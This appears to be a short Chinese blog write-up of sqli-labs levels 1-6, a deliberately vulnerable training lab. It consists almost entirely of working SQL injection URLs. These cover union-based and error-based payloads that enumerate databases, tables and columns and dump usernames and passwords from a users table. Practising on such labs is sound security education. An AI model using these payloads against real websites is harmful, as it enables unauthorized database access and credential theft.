zoukankan      html  css  js  c++  java
  • sqli-labs靶场1-6关

    写的不太详细,详细请看https://www.cnblogs.com/-qing-/p/11610385.html#_label3

    1-2关基于错误的字符串/数字型注入

    192.168.21.10/less-1/?id=1 or 1=1 --+

     192.168.21.10/less-1/?id=1' order by 3 --+#字段数为3

      192.168.21.10/less-1/?id=1' and 1=2 union select 1,2,3 --+#显示位为2,3

    192.168.21.10/less-1/?id=1' and 1=2 union select 1,version(),database() --+ #   查看版本号 ,数据库名称 192

    192.168.21.10/less-1/?id=1' AND 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security') --+ #查看所有数据库名和表名

     192.168.21.10/less-1/?id=1' AND 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+#爆出列名

     192.168.21.10/less-1/?id=1' AND 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+#爆用户名和密码

     3-4关也差不多只不过闭合符号需要用 ‘)来闭合

     

     5-6关可以布尔盲注也可以直接报错注入

     192.168.21.10/less-1/?id=1'  union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

      192.168.21.10/less-1/?id=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

     表名 192.168.21.10/less-1/?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23

     爆列

    192.168.21.10/less-1/?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 7,1),floor(rand()*2))as a from information_schema.tables group by a%23

     爆值

    192.168.21.10/less-1/?id=1' union select null,count(*),concat((select username from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23

  • 相关阅读:
    3. 无重复字符的最长子串
    24. 两两交换链表中的节点
    2. 两数相加
    23. 合并K个排序链表
    synergy配置 Ubuntu作Server, Win 7作client
    ros与下位机通信常用的c++ boost串口应用
    tar
    发布里程计传感器信息
    ROS TF——learning tf
    在linux终端下打开pdf文件
  • 原文地址:https://www.cnblogs.com/zhao-yang/p/12142084.html
Copyright © 2011-2022 走看看